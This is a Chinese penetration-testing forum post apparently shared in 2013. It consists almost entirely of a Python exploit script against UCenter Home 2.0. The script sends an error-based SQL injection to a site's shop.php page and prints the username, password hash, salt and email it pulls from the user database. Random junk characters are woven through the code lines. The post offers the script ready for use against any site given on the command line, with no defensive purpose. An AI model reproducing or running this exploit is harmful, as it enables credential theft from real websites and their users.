找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2193|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
9 h2 Y1 D: c" a5 n0 H5 C 7 P) t% L! J6 v$ l* M; |7 v
" v; h5 u% |, a3 b
#!/usr/bin/env python  0 G, ^: q3 A  S2 f& _0 V! D

" H! O# x* G- W0 z" X! w1 I) Jimport sys  
8 J9 T3 J6 c; z" eimport urllib2  
3 G0 z4 i8 V  m7 simport re  5 v# M: k8 x; D" G  G3 h& c4 f

$ F3 g3 U0 U5 e. ~def info():  
. o2 a% B+ R# w    print 'From:http://www.exploit-db.com/exploits/14997/'
" ]4 g( j  _, U  e* \5 H    print 'http://www.hake.cc/Web_loudong/' 8 x! D4 y2 w: [/ A
    print 'changed:qiaoy'  ( t5 k- G( }) a  b
    print 'exp:'  " w3 c  `: e* s& W) s. r5 L% d2 _: I
    print ' ./UCenter_Home_2.0.py site'  7 a5 P4 R$ B' V+ L8 C; Y

/ l* t, d% m& Ydef main():  , a3 H; _8 I& ]9 E/ ~: x! g: Y- j
    if len(sys.argv) != 2:  
7 f3 p3 N" W3 Y        info()  : l- D! p0 n* T+ C9 P6 |' @
    else:  
1 b4 }; q/ o4 V3 }: T        site = sys.argv[1]  - s- b- W9 [0 f# W
        if site[0:7] == 'http://':  . h- Q# F1 B9 X) H; k
            sitesite =site  
( {/ D2 U$ C. I+ D! R8 y1 j; X        elif site[0:8] == 'https://':  
1 u8 Y5 {0 l7 E; C            sitesite = site  
, ?2 a( B( a3 P6 t        else:  
0 b+ k$ n- l: F3 ]* R( P- f8 N            site = 'http://'+site  
+ Z8 ^( x4 ~5 K* Q        try:  ; |0 m2 O% }5 t6 [; s, E' ^
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
: B5 T& K- b5 {7 U  T: m& _$ u            Value = urllib2.urlopen(url).read()  
: f- [/ ^& r' p  i            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
- g5 w# q1 ?3 I% w1 j9 x1 {            hacked = Msg.split(':')  2 ^% g4 ?* z0 ^4 k2 P- d, f" M: Z
            print 'Name:    '+hacked[1]  
) d* Z9 `  ~0 L: ?            print 'Passwd:  '+hacked[2]  & W3 O1 `) I6 i/ G! A
            print 'salt:    '+hacked[3]    _% r" X- O7 k, u; U
            print 'email:   '+hacked[4]  5 @8 w  }8 O* }$ c7 A
        except:  : i# f3 ]( |- _1 @5 A. {
            print 'Sorry,I can\'t work............'  
/ E2 Y7 R$ t0 Y0 Y1 B8 v
  B; F' k* j5 L6 n9 _; `if __name__ == '__main__':  
. J% O0 E$ X* p$ t$ r1 U, M    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表